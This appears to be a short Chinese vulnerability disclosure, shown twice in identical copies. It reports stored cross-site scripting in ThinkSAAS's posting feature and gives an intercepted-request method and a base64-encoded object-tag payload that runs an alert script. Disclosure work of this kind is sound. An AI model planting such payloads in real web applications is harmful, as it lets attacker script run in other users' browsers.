VULHUB ™

### 简要描述： 很多，提一个试试。 ### 详细说明： 在发帖处， 1、编辑内容 2、抓包 3、改包在content处写入 `<object data="data:text/html;base64,PFNjcklwdD5hbGVydCgyKTwvU2NyaVB0Pg==">`可以实现xss ### 漏洞证明： 可见 ff chrome测试 http://www.thinksaas.cn/group/topic/33781/ [<img src="https://images.seebug.org/upload/201312/201453360ebf3435ff67e8725331028fb6e53c21.jpg" alt="QQ截图20131220145250.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/201453360ebf3435ff67e8725331028fb6e53c21.jpg)

### 简要描述： 很多，提一个试试。 ### 详细说明： 在发帖处， 1、编辑内容 2、抓包 3、改包在content处写入 `<object data="data:text/html;base64,PFNjcklwdD5hbGVydCgyKTwvU2NyaVB0Pg==">`可以实现xss ### 漏洞证明： 可见 ff chrome测试 http://www.thinksaas.cn/group/topic/33781/ [<img src="https://images.seebug.org/upload/201312/201453360ebf3435ff67e8725331028fb6e53c21.jpg" alt="QQ截图20131220145250.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/201453360ebf3435ff67e8725331028fb6e53c21.jpg)